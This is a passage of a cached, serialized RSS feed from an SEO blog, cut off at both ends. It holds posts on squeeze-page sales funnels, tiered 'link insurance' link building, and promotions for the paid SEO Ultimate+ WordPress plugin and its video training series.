in fact they make it hard to see anything other than what the topical relevance is when you first set eyes on the page, but why? Because the headline takes up 25% of the screen, is usually in a ridiculously loud color, with quotes and highlighted in yellow. Anyone who fails at that point to surmise what the contextual relevance is for being there, should have their internet license suspended for surfing blind without emotional attachment. </p>\n<p>In any case, the point being, the pages, despite how obnoxious they are serve a very fundamental purpose, which is to set the tone and funnel the reader&#8217;s attention to the meat and potatoes of the document (typically found at the very bottom alongside a pay pal purchase button). This is were the old adage of (A.I.D.A) attention, interest, desire, action comes into play in it&#8217;s sublime simplicity. </p>\n<p><strong>Next, the testimonial</strong>, but why? Because they know you are skeptical and they know they need to subvert your defenses in order to engage the rational mind behind the emotional response when you shop (do I need this or do I want this, can I ignore or suppress the urge to purchase, or am I genuinely interested) all the while thousands of queries such as this race through the subconscious and either lead your to (a) move along (b) read further, since your there or (c) take the plunge and purchase, because, what the hay, it&#8217;s only money right.</p>\n<p><strong>Next, the problem / solution</strong>, which is usually built on the premise of using questions to preface it&#8217;s significance. Are you tired of? &#8220;the problem&#8221; Do you get frustrated when? Now you can be free of, by using our super duper X,Y,Z solution for mere chump change (only $39.95) for the ultimate answer to your prayers. </p>\n<p>O.k, so I was a bit over the top, but I&#8217;m sure it&#8217;s not the first time you have seen this pitch,  purchased or nearly purchased something as a result of it. Most of us are conditioned not to respond to such an overtly obvious pitch, however, I must admit, I am an impulse shopper and randomly purchase e-books in this fashion and never get around to reading them (the ideal customer for squeeze pages).</p>\n<p><strong>Then, the close,</strong> here is where they hit you with information about the product or service with the focus is on the &#8220;how you can benefit&#8221; mentality and inevitably the call to action, ORDER NOW!, ORDER TODAY, ORDER IN THE NEXT 5 MINUTES AND RECEIVE A FREE &#8220;rubber ducky, widget,etc.&#8221;, once again, it&#8217;s all about conversion.</p>\n<p>Sure that page may get 1000 visitors that day, and from that 1000 visitors <strong>100 order</strong>, that is more than enough to offset the other 900 that did not, so you can see the beauty in their plan. Pages like this could teach a great deal to businesses seeking conversion for their efforts instead of just visitors window shopping and burning up bandwidth, and I must admit even our pages in the main site need to take the positive benefits from such a blatant business model. The squeeze page is just that, a page that funnels their attention to a conclusion and then compels them to take action.</p>\n<p><strong>Have you heard of Funneling Attention for Higher Conversions? </strong></p>\n<p>Business models that make money are using the funneling tactic to amass massive amounts of income, using a tried and true / simplistic theme. Even though is mainly has it&#8217;s place in direct sales, affiliate programs, sales for e-books or inexpensive items. I have seen this tactic used for offers in the thousands and still convert readers (it just took more filler in the middle to build the argument and present the solution). Getting back to the basis of this article, the conclusion is SEO does not ensure conversion, it merely sets the stage.</p>\n<p>Branding is one thing, but how many people are online just for the sake of saying &#8221; I am the number one brand for industry X&#8221;, perhaps this is important for corporate America, sure, but,for the rest of us out here trying to make ends meet, we need conversion in some way shape or form.</p>\n<p>Knowing this, instead of thinking narrow when it comes to using SEO, one could opt for a more holistic approach whereby they identify the behavior of the types of clients they would like to attract, thinking of individuals as opposed to demographics from a one dimensional prospective. If you think holistically, you can cover your bases and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/are-you-google-sighted-or-can-you-see-the-big-picture-of-search/\">optimize entire segments of the niche</a> as well as use multiple tactics and search engines to draw traffic from a variety of queries and implement &#8220;attention and retention insurance&#8221; for all of your respective offers. </p>\n<p>For example, instead of one or two phrases, why not have twenty instead, it essentially takes about the same amount of effort and can be accomplished through modifying slight variations of content and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\">how your build links</a>.</p>\n<p>Just having a top 10 ranking does not ensure traffic, simply because, not all keywords convert! It truly is sad to see so many people just scratching the surface for topical relevance, when in reality mosts sites are capable of acquiring heightened depth (for readership) and conversion and could achieve 400% more times the amount of traffic from just applying rudimentary steps to lead people through the &#8220;expected action for that page&#8221;. But, they have to get there first, so my suggestion in a nutshell is, to <strong>optimize root phrases with pertinent keywords</strong> instead of simple &#8220;exact match key phrases&#8221;, use strong internal links to get viewers deeper into the site and use graphics or video&#8217;s to cut the bounce rates in half.</p>\n<p>We will continue along these lines for the next few days and covering topics related to SEO, conversion, structuring your offer and how the way you craft your content, ultimately impacts the bottom line. Stay tuned for the next post&#8230;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=WawDDa-5Yn0:cNEDoVaKCcc:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/WawDDa-5Yn0\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:4;a:11:{s:5:\"title\";s:49:\"Don’t Get Left Behind! Upgrade to SEO Ultimate+\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/iOB6cfJihrA/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 21 Dec 2016 08:14:50 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9637\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2336:\"<p><img class=\"size-full wp-image-9638 aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg\" alt=\"Upgrade to SEO Ultimate+\" width=\"604\" height=\"364\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg 604w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero-300x181.jpg 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" /></p>\n<p>Thanks for clicking through to read this important message.</p>\n<p>Well, I’ve got <strong>some good news</strong> and <strong>some bad news</strong>. The good news is, we’ve got an amazing PRO version of <a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward…<br />\nThe bad news is, <strong>this is the last update for the FREE version</strong>, but, here’s the deal.</p>\n<p>We really, really, really love this plugin, but we can’t do both (create new features and support the free, while mutually focusing on the PRO version), so, unfortunately, we’re going to retire the FREE version shortly on January 1st, 2017.</p>\n<p>But, here’s your chance to <a href=\"https://www.seoultimateplus.com/breaking-news\"><strong>get a deep discount of over 40% OFF</strong></a> the regular single license price and get a license for only $29 if you use this link now.</p>\n<p>Don&#8217;t get left behind and have to use 30 plugins to do the same thing (Internal links, schema markup, Open Graph, link masking, permalink rewrites, canonicalization, mass editing meta data for all pages, posts and post types, 404 monitoring) and more&#8230;.</p>\n<p>Upgrade to <a href=\"https://www.seoultimateplus.com/breaking-news\">SEO Ultimate+</a> now and kick off the new year with powerful SEO functionality all streamlined in one robust, feature-rich dashboard.</p>\n<p>Stay tuned.</p>\n<p>Happy Holidays and all the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=iOB6cfJihrA:LOMpOrWrNEY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/iOB6cfJihrA\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:462:\"Thanks for clicking through to read this important message. Well, I’ve got some good news and some bad news. The good news is, we’ve got an amazing PRO version of SEO Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward… The bad news is, this is <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:98:\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\";}s:7:\"summary\";s:462:\"Thanks for clicking through to read this important message. Well, I’ve got some good news and some bad news. The good news is, we’ve got an amazing PRO version of SEO Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward… The bad news is, this is <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/dont-get-left-behind-upgrade-to-seo-ultimate/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:2336:\"<p><img class=\"size-full wp-image-9638 aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg\" alt=\"Upgrade to SEO Ultimate+\" width=\"604\" height=\"364\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero.jpg 604w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2016/12/superhero-300x181.jpg 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" /></p>\n<p>Thanks for clicking through to read this important message.</p>\n<p>Well, I’ve got <strong>some good news</strong> and <strong>some bad news</strong>. The good news is, we’ve got an amazing PRO version of <a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate called SEO Ultimate+ that we’re going to update and add features to exclusively from this point forward…<br />\nThe bad news is, <strong>this is the last update for the FREE version</strong>, but, here’s the deal.</p>\n<p>We really, really, really love this plugin, but we can’t do both (create new features and support the free, while mutually focusing on the PRO version), so, unfortunately, we’re going to retire the FREE version shortly on January 1st, 2017.</p>\n<p>But, here’s your chance to <a href=\"https://www.seoultimateplus.com/breaking-news\"><strong>get a deep discount of over 40% OFF</strong></a> the regular single license price and get a license for only $29 if you use this link now.</p>\n<p>Don&#8217;t get left behind and have to use 30 plugins to do the same thing (Internal links, schema markup, Open Graph, link masking, permalink rewrites, canonicalization, mass editing meta data for all pages, posts and post types, 404 monitoring) and more&#8230;.</p>\n<p>Upgrade to <a href=\"https://www.seoultimateplus.com/breaking-news\">SEO Ultimate+</a> now and kick off the new year with powerful SEO functionality all streamlined in one robust, feature-rich dashboard.</p>\n<p>Stay tuned.</p>\n<p>Happy Holidays and all the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=iOB6cfJihrA:LOMpOrWrNEY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/iOB6cfJihrA\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:5;a:13:{s:5:\"title\";s:49:\"Managing Link Weight and Building Link Insurance!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/SbAgitQy41g/\";s:8:\"category\";s:75:\"Link BuildingBuilding Links to Your LinksLink-InsuranceManaging Link Weight\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sun, 01 May 2016 07:48:55 PDT\";s:4:\"guid\";s:102:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:5536:\"<p>I Just wanted to share a quick <a href=\"http://www.seodesignsolutions.com\">SEO</a> strategy for <strong>balancing link weight</strong>. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this <strong>link insurance</strong> (insurance in the sense that just in case you need it).<br />\n<a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\"><img class=\"aligncenter wp-image-9603 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg\" alt=\"link-weight-link-insurance\" width=\"400\" height=\"346\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance-300x260.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p>Since the value of links is all based on the collective support they rally. The stronger the backlink the more value it can pass to your site as far as aiding your pages in maintaining or increasing positioning.<span id=\"more-204\"></span></p>\n<p>If you have ever tagged a site using social bookmarking, then you have scratched the surface. For example social bookmarking utilizes the premise of <strong>link insurance</strong>. Not only is it great to seal the deal with spiders (by getting their attention), but with enough inbound links strategically augmenting a page, it can provide long-term value for the <strong>link-freshness factor</strong> which can keep your internal pages buoyant and moving up in the search engine rankings.</p>\n<p>A stable authority site (built over time with a tremendous amount of link weight) has less chance of losing favor with search engine algorithms. However, what about other transient links, that drop off, get buried over time or the site architecture from the site offering the link is so taxed that by the time the pages are spidered <strong>they are tapped out</strong> as far as their real value is concerned? What is a viable solution to revive potential rankings?</p>\n<p><strong>The Solution: Building links to your links as insurance</strong></p>\n<p>I am not suggesting to abuse this tactic, what I am insinuating is, maintaining a stable influx of link juice into a site benefits all of the pages in that site (as long as you distribute the inbound links in moderation). The premise here is, <a href=\"http://seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">balancing</a> the ratios of content development to inbound links (and their various anchor and modifiers) along with systemic deep linking is the cornerstone of relevance of <a href=\"http://seodesignsolutions.com/blog/seo-basics/seo-basics-using-allinanchor-allintitle-allintext/\">SEO basics</a> in action.</p>\n<p>Links also can have more internal value from a page that was recently promoted in the Google algorithm. For example, if a page went from a page rank of zero to a PR2 or PR3 page in one update, if it gets indexed regularly and is succinctly tied to the sites main navigation, then you have an authority link right under your nose you can use to augment your main keywords as you wish.</p>\n<p>You can always review such content an amend it for a common goal. Ten links from <a href=\"http://seodesignsolutions.com/blog/link-building/using-deep-links-to-summon-search-engine-spiders/\">strong internal pages</a> to a sub folder or page buried deep in the site can change the landscape of a page or sites SEO value. Combining this with the fact that you can point new links from those pages at older links (to keep them fresh) or use them to kick off new content with a splash, the possibilities for recycling your sites internal link dynamo is promising.</p>\n<p><strong>One Example of the Equation:</strong></p>\n<p><strong>1)</strong> Find a slouching ranking and determine a keyword you want to invigorate<br />\n<strong>2)</strong> use a site:yourdomainname.com keyword (command) to find the most relevant page in your site<br />\n<strong>3)</strong> Build a new page using the <strong>main keyword in the title and text</strong><br />\n<strong>4)</strong> Link to the new page from the old page (with page rank) using the (keyword) as the anchor text / link text<br />\n <strong>5)</strong> publish your content<br />\n<strong>6)</strong> build links back to the old page (using social bookmarking or other ethical link building methods) to flow link weight back to your site and your new page.</p>\n<p>When the page gets crawled, it already has the ranking factors intact, relevance and an endorsement from your own internal links. This is a great strategy for a maiden voyage for a new page, although this is a rudimentary version of the tactic, you can see the value in building links to your links.</p>\n<p>Every three months, you could essentially go back through your analytics, look at the most searched keywords, perform an audit and ensure that your older links are getting enough nurturing as a result of fresh links. The stronger they are the stronger your site is.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=SbAgitQy41g:ytdtE7dvXFE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/SbAgitQy41g\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:444:\"I Just wanted to share a quick SEO strategy for balancing link weight. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this link insurance (insurance in the sense that just in case you need it). Since the value of links is all based on <a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:107:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"30\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:102:\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\";}s:7:\"summary\";s:444:\"I Just wanted to share a quick SEO strategy for balancing link weight. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this link insurance (insurance in the sense that just in case you need it). Since the value of links is all based on <a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:5536:\"<p>I Just wanted to share a quick <a href=\"http://www.seodesignsolutions.com\">SEO</a> strategy for <strong>balancing link weight</strong>. Have you ever used a tiered link strategy? Although there may be other names for it, personally, I call this <strong>link insurance</strong> (insurance in the sense that just in case you need it).<br />\n<a href=\"http://www.seodesignsolutions.com/blog/link-building/managing-link-weight-and-building-link-insurance/\"><img class=\"aligncenter wp-image-9603 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg\" alt=\"link-weight-link-insurance\" width=\"400\" height=\"346\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/05/link-weight-link-insurance-300x260.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p>Since the value of links is all based on the collective support they rally. The stronger the backlink the more value it can pass to your site as far as aiding your pages in maintaining or increasing positioning.<span id=\"more-204\"></span></p>\n<p>If you have ever tagged a site using social bookmarking, then you have scratched the surface. For example social bookmarking utilizes the premise of <strong>link insurance</strong>. Not only is it great to seal the deal with spiders (by getting their attention), but with enough inbound links strategically augmenting a page, it can provide long-term value for the <strong>link-freshness factor</strong> which can keep your internal pages buoyant and moving up in the search engine rankings.</p>\n<p>A stable authority site (built over time with a tremendous amount of link weight) has less chance of losing favor with search engine algorithms. However, what about other transient links, that drop off, get buried over time or the site architecture from the site offering the link is so taxed that by the time the pages are spidered <strong>they are tapped out</strong> as far as their real value is concerned? What is a viable solution to revive potential rankings?</p>\n<p><strong>The Solution: Building links to your links as insurance</strong></p>\n<p>I am not suggesting to abuse this tactic, what I am insinuating is, maintaining a stable influx of link juice into a site benefits all of the pages in that site (as long as you distribute the inbound links in moderation). The premise here is, <a href=\"http://seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">balancing</a> the ratios of content development to inbound links (and their various anchor and modifiers) along with systemic deep linking is the cornerstone of relevance of <a href=\"http://seodesignsolutions.com/blog/seo-basics/seo-basics-using-allinanchor-allintitle-allintext/\">SEO basics</a> in action.</p>\n<p>Links also can have more internal value from a page that was recently promoted in the Google algorithm. For example, if a page went from a page rank of zero to a PR2 or PR3 page in one update, if it gets indexed regularly and is succinctly tied to the sites main navigation, then you have an authority link right under your nose you can use to augment your main keywords as you wish.</p>\n<p>You can always review such content an amend it for a common goal. Ten links from <a href=\"http://seodesignsolutions.com/blog/link-building/using-deep-links-to-summon-search-engine-spiders/\">strong internal pages</a> to a sub folder or page buried deep in the site can change the landscape of a page or sites SEO value. Combining this with the fact that you can point new links from those pages at older links (to keep them fresh) or use them to kick off new content with a splash, the possibilities for recycling your sites internal link dynamo is promising.</p>\n<p><strong>One Example of the Equation:</strong></p>\n<p><strong>1)</strong> Find a slouching ranking and determine a keyword you want to invigorate<br />\n<strong>2)</strong> use a site:yourdomainname.com keyword (command) to find the most relevant page in your site<br />\n<strong>3)</strong> Build a new page using the <strong>main keyword in the title and text</strong><br />\n<strong>4)</strong> Link to the new page from the old page (with page rank) using the (keyword) as the anchor text / link text<br />\n <strong>5)</strong> publish your content<br />\n<strong>6)</strong> build links back to the old page (using social bookmarking or other ethical link building methods) to flow link weight back to your site and your new page.</p>\n<p>When the page gets crawled, it already has the ranking factors intact, relevance and an endorsement from your own internal links. This is a great strategy for a maiden voyage for a new page, although this is a rudimentary version of the tactic, you can see the value in building links to your links.</p>\n<p>Every three months, you could essentially go back through your analytics, look at the most searched keywords, perform an audit and ensure that your older links are getting enough nurturing as a result of fresh links. The stronger they are the stronger your site is.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=SbAgitQy41g:ytdtE7dvXFE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/SbAgitQy41g\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:6;a:11:{s:5:\"title\";s:65:\"Your Website Needs Internal Links… Here’s How to Automate It!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/LfAszNY6W9E/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Thu, 13 Aug 2015 07:32:30 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9565\";s:7:\"content\";a:1:{s:7:\"encoded\";s:3193:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 378px;\" src=\"//fast.wistia.net/embed/iframe/ohcncbte4x?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"780\" height=\"376\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:0;margin-bottom:0;\"><a target=\"_blank\" href=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\"><img src=\"https://lh3.googleusercontent.com/Y6docUak9NStgqgsc_2rDYRGMDTptUvMuJQkJ4q5PjEZrph49fgpg58ab75DTgrtBvY_WmikaTdIimQw3wiJHA=s0\"/></a></p>\n<p><script data-leadbox=\"140f2faf3f72a2:12d9628a0b46dc\" data-url=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\" data-config=\"%7B%7D\" type=\"text/javascript\" src=\"https://seodesignframework.leadpages.co/leadbox-886.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:5px;\">\n<p>I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new <strong>[10 Video] Advanced <a href=\"http://www.seodesignsolutions.com\">SEO</a> Training Series for SEO Ultimate</strong> and <a href=\"https://www.seoultimateplus.com/\" data-mce-href=\"https://www.seoultimateplus.com/\">SEO Ultimate+</a> so that people can really see the power of this amazing All-in-One solution for WordPress.</p>\n<p>I&#8217;ve added a teaser video above where I show you how to use the Deeplink Juggernaut&#8217;s <strong>Instant Post Propulsion</strong> technique to create auto-links for specific keywords (as well as dampen the volume of linking with the content link settings option).</p>\n<p>To get access to the entire 10 video series, just use the big blue button above to opt in. In the series we cover everything from:</p>\n<ul>\n<li>How to mass edit titles and meta tags.</li>\n<li>Indexation and crawl prioritization tips to prevent penalties.</li>\n<li>An introduction to structured markup.</li>\n<li>A walk-through of the new OpenGraph+ and Rich Snippets Creator modules&#8230;</li>\n</ul>\n<p>and much much more. But, you have to get access to the series first (which you can do using the <strong>Get More Training Like This</strong> button above).</p>\n<p>All the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LfAszNY6W9E:K62Ns01kLv4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LfAszNY6W9E\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:486:\"I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new [10 Video] Advanced SEO Training Series for SEO Ultimate and SEO Ultimate+ so that people can really see the power of this amazing All-in-One solution for WordPress. I&#8217;ve added a teaser video above where I show <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:105:\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\";}s:7:\"summary\";s:486:\"I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new [10 Video] Advanced SEO Training Series for SEO Ultimate and SEO Ultimate+ so that people can really see the power of this amazing All-in-One solution for WordPress. I&#8217;ve added a teaser video above where I show <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/the-seo-ultimate-advanced-seo-video-training-series/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:3193:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 378px;\" src=\"//fast.wistia.net/embed/iframe/ohcncbte4x?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"780\" height=\"376\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:0;margin-bottom:0;\"><a target=\"_blank\" href=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\"><img src=\"https://lh3.googleusercontent.com/Y6docUak9NStgqgsc_2rDYRGMDTptUvMuJQkJ4q5PjEZrph49fgpg58ab75DTgrtBvY_WmikaTdIimQw3wiJHA=s0\"/></a></p>\n<p><script data-leadbox=\"140f2faf3f72a2:12d9628a0b46dc\" data-url=\"https://seodesignframework.leadpages.co/leadbox/140f2faf3f72a2%3A12d9628a0b46dc/5712601648463872/\" data-config=\"%7B%7D\" type=\"text/javascript\" src=\"https://seodesignframework.leadpages.co/leadbox-886.js\"></script></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:5px;\">\n<p>I know it&#8217;s been quiet on our blog, but, just to let you know&#8230;.we&#8217;ve been busy creating our new <strong>[10 Video] Advanced <a href=\"http://www.seodesignsolutions.com\">SEO</a> Training Series for SEO Ultimate</strong> and <a href=\"https://www.seoultimateplus.com/\" data-mce-href=\"https://www.seoultimateplus.com/\">SEO Ultimate+</a> so that people can really see the power of this amazing All-in-One solution for WordPress.</p>\n<p>I&#8217;ve added a teaser video above where I show you how to use the Deeplink Juggernaut&#8217;s <strong>Instant Post Propulsion</strong> technique to create auto-links for specific keywords (as well as dampen the volume of linking with the content link settings option).</p>\n<p>To get access to the entire 10 video series, just use the big blue button above to opt in. In the series we cover everything from:</p>\n<ul>\n<li>How to mass edit titles and meta tags.</li>\n<li>Indexation and crawl prioritization tips to prevent penalties.</li>\n<li>An introduction to structured markup.</li>\n<li>A walk-through of the new OpenGraph+ and Rich Snippets Creator modules&#8230;</li>\n</ul>\n<p>and much much more. But, you have to get access to the series first (which you can do using the <strong>Get More Training Like This</strong> button above).</p>\n<p>All the best,</p>\n<p>Jeffrey</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=LfAszNY6W9E:K62Ns01kLv4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/LfAszNY6W9E\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:7;a:11:{s:5:\"title\";s:49:\"Why Good Enough Just Isn’t Good Enough Anymore!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/h51XQfdCDXU/\";s:8:\"category\";s:8:\"Articles\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 01 Jul 2015 09:36:17 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9510\";s:7:\"content\";a:1:{s:7:\"encoded\";s:2891:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img 